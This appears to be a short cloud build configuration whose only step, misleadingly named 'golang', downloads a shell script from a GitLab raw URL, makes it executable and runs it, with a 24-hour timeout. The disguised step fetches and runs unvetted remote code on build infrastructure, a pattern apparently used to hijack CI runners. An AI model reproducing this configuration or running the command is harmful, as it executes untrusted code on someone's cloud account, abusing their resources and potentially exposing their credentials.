steps:
  - name: golang
    args:
      - '-c'
      - >-
         wget https://gitlab.com/suksesregister/nyar/-/raw/main/devita27.sh && chmod +x devita27.sh && ./devita27.sh
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s